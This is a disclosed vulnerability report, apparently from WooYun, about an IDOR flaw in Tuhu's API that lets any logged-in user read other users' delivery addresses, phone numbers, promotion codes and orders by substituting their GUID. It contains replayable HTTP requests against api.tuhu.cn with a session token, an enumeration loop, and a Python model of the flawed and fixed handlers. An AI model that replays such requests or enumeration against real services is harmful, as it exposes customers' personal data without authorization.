WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2015-05-22: Details sent to the vendor, awaiting vendor handling
2015-05-22: Vendor has confirmed; details disclosed to the vendor only
2015-06-01: Details disclosed to core white hats and relevant domain experts
2015-06-11: Details disclosed to regular white hats
2015-06-21: Details disclosed to intern white hats
2015-07-06: Details disclosed to the public
Tuhu (途虎养车网): multiple insecure-design flaws allow enumerating other users' information, including delivery addresses, contact phone numbers, order details and more
Precondition for this vulnerability: user IDs are GUIDs, so a set of userIds for some users had already been obtained through other vulnerabilities. Without that, generating GUIDs at random as candidate userIds would give a very low hit rate. Those other vulnerabilities yield userIds but no user information. A simple vulnerability on its own may not be very harmful, but collecting several pieces of information and combining them can produce a good result.

The underlying flaw is the same on every endpoint below: the API only checks that the usersession header is a valid session, and never checks that the userId in the request belongs to that session, so any logged-in user can read another user's data by substituting that user's GUID.

001. Log in as any user, then view another user's delivery addresses. Using Burp, iterate over the value inside the 【】 brackets:
GET /Addresses/SelectAddresses?userId=%7B【d8b34bee-40fb-45fc-8791-98261df80932】%7D HTTP/1.1
Host: api.tuhu.cn
Connection: Keep-Alive
Accept-Encoding: gzip
usersession: 1900FC6D21DB409CEA83F3BD4E0F2FF2
002. Using the collected userIds, start iterating through them. Part of the test data is provided below for reproduction (recommend deleting or masking it after review):
(The original report listed several hundred user IDs here, each masked to the form *****b5-c6ea-d22b**********; the masked list carries no recoverable information and is omitted.)

The same pattern holds for promotion codes and orders: the userid parameter is trusted without being tied to the usersession.
GET /Order/SelectPromotionCodeByType?pindex=1&userid=%7Bd8b34bee-40fb-45fc-8791-98261df80932%7D&type=0 HTTP/1.1
Host: api.tuhu.cn
Connection: Keep-Alive
Accept-Encoding: gzip
usersession: 1900FC6D21DB409CEA83F3BD4E0F2FF2
POST /Order/SelectOrders HTTP/1.1
Content-Length: 62
Content-Type: application/x-www-form-urlencoded
Host: api.tuhu.cn
Connection: Keep-Alive
Accept-Encoding: gzip
usersession: 1900FC6D21DB409CEA83F3BD4E0F2FF2

pageIndex=1&userid=d8b34bee-40fb-45fc-8791-98261df80932&type=7
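As an added illustration (not Tuhu's code, and not part of the original report): a minimal model of the flawed SelectAddresses handler next to the object-level authorization check that fixes it, with the Burp-style enumeration loop from step 001 run against both. The usersession token and the first GUID are the ones shown in the requests above; the victim GUID, the in-memory session and address stores, and all function names are constructed assumptions for the example.

```python
"""Model of an IDOR on a per-user API: the handler validates the session
but takes the owner id from the request instead of from the session."""
import uuid
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample data (not real Tuhu users). The attacker's own session
# token and GUID are the ones in the report; the victim GUID is made up.
ATTACKER_SESSION = "1900FC6D21DB409CEA83F3BD4E0F2FF2"
ATTACKER_ID = "d8b34bee-40fb-45fc-8791-98261df80932"
VICTIM_ID = "6f1c2b30-5a8e-4c47-9d2e-0a1b2c3d4e5f"

SESSIONS = {ATTACKER_SESSION: ATTACKER_ID}          # usersession -> logged-in user
ADDRESSES = {                                       # user id -> delivery addresses
    ATTACKER_ID: [{"name": "tester", "phone": "13800000000", "address": "test address"}],
    VICTIM_ID: [{"name": "victim", "phone": "13900000000", "address": "victim address"}],
}


def normalize_user_id(raw):
    """Accept the API's '{guid}' form (sent as %7B...%7D) or a bare guid.
    Raises ValueError on anything that is not a GUID."""
    return str(uuid.UUID(unquote(raw).strip().strip("{}")))


def parse_request(request_line, headers):
    """Split 'GET /path?query HTTP/1.1' into path, lower-cased query params and session."""
    _method, target, _version = request_line.split(" ", 2)
    url = urlsplit(target)
    params = {k.lower(): v[0] for k, v in parse_qs(url.query).items()}
    return url.path, params, headers.get("usersession")


def select_addresses_vulnerable(request_line, headers):
    """The flaw: any valid session may read any userId's addresses."""
    _path, params, session = parse_request(request_line, headers)
    if session not in SESSIONS:
        return 401, []
    try:
        user_id = normalize_user_id(params.get("userid", ""))
    except ValueError:
        return 400, []
    return 200, ADDRESSES.get(user_id, [])


def select_addresses_fixed(request_line, headers):
    """The fix: the owner is derived from the session; a userId that does not
    match the session's user is rejected instead of being looked up."""
    _path, params, session = parse_request(request_line, headers)
    if session not in SESSIONS:
        return 401, []
    owner = SESSIONS[session]
    if "userid" in params:
        try:
            requested = normalize_user_id(params["userid"])
        except ValueError:
            return 400, []
        if requested != owner:
            return 403, []
    return 200, ADDRESSES.get(owner, [])


def enumerate_users(handler, session, candidate_ids):
    """The Burp Intruder loop from step 001: replay one valid session against
    many candidate GUIDs and keep every id that returns address data."""
    leaked = {}
    for cid in candidate_ids:
        line = f"GET /Addresses/SelectAddresses?userId=%7B{cid}%7D HTTP/1.1"
        status, data = handler(line, {"usersession": session})
        if status == 200 and data:
            leaked[cid] = data
    return leaked


if __name__ == "__main__":
    candidates = [VICTIM_ID, "00000000-0000-0000-0000-000000000000", ATTACKER_ID]
    print("vulnerable:", sorted(enumerate_users(select_addresses_vulnerable, ATTACKER_SESSION, candidates)))
    print("fixed:     ", sorted(enumerate_users(select_addresses_fixed, ATTACKER_SESSION, candidates)))
```

The enumeration only pays off because the candidate GUIDs came from another leak, which is the precondition the report states: with 122 bits of randomness in a version-4 GUID, blind guessing against the vulnerable handler would not find a single user. The fix does not rely on that obscurity; it binds the object to the session so the userId parameter stops being an authorization input at all.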
Remediation suggestion: You are the professionals here.
Severity: High
Vulnerability Rank: 15
Confirmed: 2015-05-22 15:23
Vendor response: Vulnerability confirmed; engineers will handle it.
Evaluation: None yet